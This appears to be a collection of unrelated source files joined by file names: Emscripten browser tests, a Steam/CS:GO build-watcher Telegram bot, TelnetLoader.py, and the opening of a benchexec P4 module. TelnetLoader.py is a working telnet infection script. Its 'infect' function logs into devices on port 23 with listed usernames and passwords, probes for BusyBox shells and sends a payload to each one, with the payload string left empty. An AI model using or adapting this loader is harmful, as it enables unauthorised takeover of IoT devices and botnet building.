self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that it is possible to load two asm.js compiled programs to one page when both --separate-asm and MODULARIZE=1 is used, by assigning
# the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
|
gameservers.py
|
import sys
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import gevent.monkey
gevent.monkey.patch_all()
import time
import logging
from threading import Thread
from steam.enums import EResult
from steam.client import SteamClient
from csgo.client import CSGOClient
import telebot
import config
from addons import file_manager, strings
from web import GameVersion
logging.basicConfig(
level=logging.DEBUG, format='%(asctime)s | %(threadName)s | %(name)s: %(message)s', datefmt='%H:%M:%S — %d/%m/%Y')
client = SteamClient()
client.set_credential_location(config.STEAM_CREDS_PATH)
cs = CSGOClient(client)
gv = GameVersion()
@client.on("error")
def handle_error(result):
print(f"\n> Logon result: {repr(result)}\n")
@client.on("channel_secured")
def send_login():
if client.relogin_available:
client.relogin()
@client.on("connected")
def handle_connected():
print(f"\n> Connected to {client.current_server_addr}\n")
@client.on("reconnect")
def handle_reconnect(delay):
print(f"\n> Reconnect in {delay}s...\n")
@client.on("disconnected")
def handle_disconnect():
print("\n> Disconnected.\n")
if client.relogin_available:
print("\n> Reconnecting...\n")
client.reconnect(maxdelay=30)
@cs.on('connection_status')
def gc_ready(status):
if status == 0:
game_coordinator = 'normal'
elif status == 1:
game_coordinator = 'internal server error'
elif status == 2:
game_coordinator = 'internal bot error'
elif status == 3:
game_coordinator = 'reloading'
elif status == 4:
game_coordinator = 'internal Steam error'
else:
game_coordinator = 'unknown'
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
cache_key_list = []
for keys, values in cacheFile.items():
cache_key_list.append(keys)
if game_coordinator != cacheFile['game_coordinator']:
file_manager.updateJson(
config.CACHE_FILE_PATH, game_coordinator, cache_key_list[2])
@client.on("logged_on")
def handle_after_logon():
t1 = Thread(target = depots)
t1.start()
t2 = Thread(target = gc)
t2.start()
def depots():
while True:
try:
for keys, values in client.get_product_info(apps=[730], timeout=15).items():
for k, v in values.items():
currentDPRBuild = v['depots']['branches']['dpr']['buildid']
currentPublicBuild = v['depots']['branches']['public']['buildid']
try:
currentRKVBuild = v['depots']['branches']['rkvtest']['buildid']
except Exception as e:
print(f'\n> Error fetching RKV build:\n\n{e}\n')
try:
currentTestBuild = v['depots']['branches']['test']['buildid']
except Exception as e:
print(f'\n> Error fetching Test build:\n\n{e}\n')
except Exception as e:
print(f'\n> Error trying to fetch depots:\n\n{e}\n')
time.sleep(45)
continue
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
cache_key_list = []
for keys, values in cacheFile.items():
cache_key_list.append(keys)
if currentDPRBuild != cacheFile['dpr_build_ID']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentDPRBuild, cache_key_list[1])
send_alert(currentDPRBuild, cache_key_list[1])
t3 = Thread(target = ds)
t3.start()
if currentPublicBuild != cacheFile['public_build_ID']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentPublicBuild, cache_key_list[0])
send_alert(currentPublicBuild, cache_key_list[0])
t4 = Thread(target = gv_updater)
t4.start()
if currentRKVBuild != cacheFile['rkvtest']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentRKVBuild, cache_key_list[25])
send_alert(currentRKVBuild, cache_key_list[25])
if currentTestBuild != cacheFile['test']:
file_manager.updateJson(
config.CACHE_FILE_PATH, currentTestBuild, cache_key_list[26])
send_alert(currentTestBuild, cache_key_list[26])
time.sleep(45)
def gc():
cs.launch()
def ds():
timeout = time.time() + 60*90
while True:
try:
for keys, values in client.get_product_info(apps=[741], timeout=15).items():
for k, v in values.items():
currentDSchangenumber = v['_change_number']
except Exception as e:
print(f'\n> First DS run error:\n\n{e}\n')
time.sleep(45)
continue
while True:
try:
for keys, values in client.get_product_info(apps=[741], timeout=15).items():
for k, v in values.items():
newDSchangenumber = v['_change_number']
except Exception as e:
print(f'\n> Second DS run error:\n\n{e}\n')
time.sleep(45)
continue
if newDSchangenumber != currentDSchangenumber:
send_alert(newDSchangenumber, 'ds')
sys.exit()
elif time.time() > timeout:
sys.exit()
time.sleep(45)
def gv_updater():
while True:
try:
newValue = gv.get_gameVer()
except Exception as e:
print(f'\n> Error trying to get new version:\n\n{e}\n')
time.sleep(45)
continue
cacheFile = file_manager.readJson(config.CACHE_FILE_PATH)
oldVersion = cacheFile['client_version']
keyList = ['client_version', 'server_version', 'patch_version', 'version_timestamp']
if newValue[0] != oldVersion:
for val, key in zip(newValue, keyList):
file_manager.updateJson(
config.CACHE_FILE_PATH, val, key)
sys.exit()
time.sleep(45)
def send_alert(newVal, key):
if key == 'public_build_ID':
text = strings.notificationTextUPD.format(newVal)
elif key == 'dpr_build_ID':
text = strings.notificationTextDPR.format(newVal)
elif key == 'rkvtest':
text = strings.notificationTextRKV.format(newVal)
elif key == 'test':
text = strings.notificationTextTST.format(newVal)
elif key == 'ds':
text = strings.notificationTextDS.format(newVal)
bot = telebot.TeleBot(config.BOT_TOKEN)
if not config.TEST_MODE:
chat_list = [config.CSGOBETACHAT, config.CSGONOTIFY, config.AQ]
else:
chat_list = [config.AQ]
for chatID in chat_list:
msg = bot.send_message(
chatID, text, parse_mode='html', disable_web_page_preview=True)
if chatID == config.CSGOBETACHAT:
bot.pin_chat_message(msg.chat.id, msg.id,
disable_notification=True)
try:
result = client.login(username=config.STEAM_USERNAME,
password=config.STEAM_PASS)
if result != EResult.OK:
print(f"\n> Failed to login: {repr(result)}\n")
raise SystemExit
client.run_forever()
except KeyboardInterrupt:
if client.connected:
print("\n> Logout\n")
client.logout()
|
TelnetLoader.py
|
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="" #payload to send
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mPayload Sent!\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass
session.join()
|
p4execution.py
|
# SPDX-FileCopyrightText: 2020-2021 CASTOR Software Research Centre
# <https://www.castor.kth.se/>
# SPDX-FileCopyrightText: 2020-2021 Johan Paulsson
# SPDX-License-Identifier: Apache-2.0
import os
import logging
import time
import threading
from benchexec import systeminfo
from p4.p4_run_setup import P4SetupHandler
from p4.counter import Counter
from benchexec import tooladapter
from benchexec import util
from benchexec import BenchExecException
# File handling
from shutil import copyfile, rmtree
import json
from distutils.dir_util import copy_tree
try:
import docker
except ModuleNotFoundError:
raise BenchExecException(
"Python-docker package not found. Try reinstalling python docker module"
)
try:
from pyroute2 import IPRoute
from pyroute2 import NetNS
except ModuleNotFoundError:
raise BenchExecException(
"pyroute2 python package not found. Try reinstalling pyroute2"
)
STOPPED_BY_INTERRUPT = False
# Static Parameters
